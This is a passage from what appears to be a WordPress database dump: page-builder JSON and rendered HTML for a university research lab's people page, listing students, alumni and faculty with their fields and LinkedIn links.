student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c62\",\"parentId\":\"182-c61\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c61\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c130\",\"parentId\":\"182-c129\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c129\",\"parentId\":\"182-c128\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c128\",\"parentId\":\"182-c61\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c133\",\"parentId\":\"182-c132\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c133\",\"index\":0,\"id\":\"182-c134\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c133\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c133\",\"index\":2,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c133\",\"index\":1,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c132\",\"parentId\":\"182-c131\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c131\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c140\",\"parentId\":\"182-c139\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c139\",\"parentId\":\"182-c138\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c138\",\"parentId\":\"182-c131\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c143\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c143\",\"index\":0,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c143\",\"index\":0,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c143\",\"index\":2,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c143\",\"index\":1,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c148\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c148\",\"index\":0,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c148\",\"index\":0,\"id\":\"182-c150\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c148\",\"index\":2,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c148\",\"index\":1,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c153\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c153\",\"index\":0,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c153\",\"index\":0,\"id\":\"182-c155\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c153\",\"index\":2,\"id\":\"182-c156\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c153\",\"index\":1,\"id\":\"182-c157\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c158\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c158\",\"index\":0,\"id\":\"182-c159\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c158\",\"index\":0,\"id\":\"182-c160\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c158\",\"index\":2,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c158\",\"index\":1,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c163\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c163\",\"index\":0,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c163\",\"index\":0,\"id\":\"182-c165\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c163\",\"index\":2,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c163\",\"index\":1,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c168\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c168\",\"index\":0,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c168\",\"index\":0,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c168\",\"index\":2,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c168\",\"index\":1,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c173\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c173\",\"index\":0,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c173\",\"index\":0,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c173\",\"index\":2,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c173\",\"index\":1,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c178\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c178\",\"index\":0,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c178\",\"index\":0,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c178\",\"index\":2,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c182\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c182\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c182\",\"index\":0,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c182\",\"index\":2,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c182\",\"index\":1,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c187\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c187\",\"index\":0,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c187\",\"index\":0,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c187\",\"index\":2,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c187\",\"index\":1,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c194\",\"parentId\":\"182-c193\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c193\",\"parentId\":\"182-c192\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c192\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-12 15:30:01','2023-10-12 19:30:01','',562,'https://gsudice.dataconn.net/?p=1649',0,'revision','',0),(1650,1,'2023-10-12 15:30:01','2023-10-12 19:30:01','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c58\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c58 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c59-outer\">\n            <div data-colibri-id=\"182-c59\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c59 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-986 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-headshot-1-e1651208089645-1-e1697138345727.jpg\" class=\"wp-image-1646 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 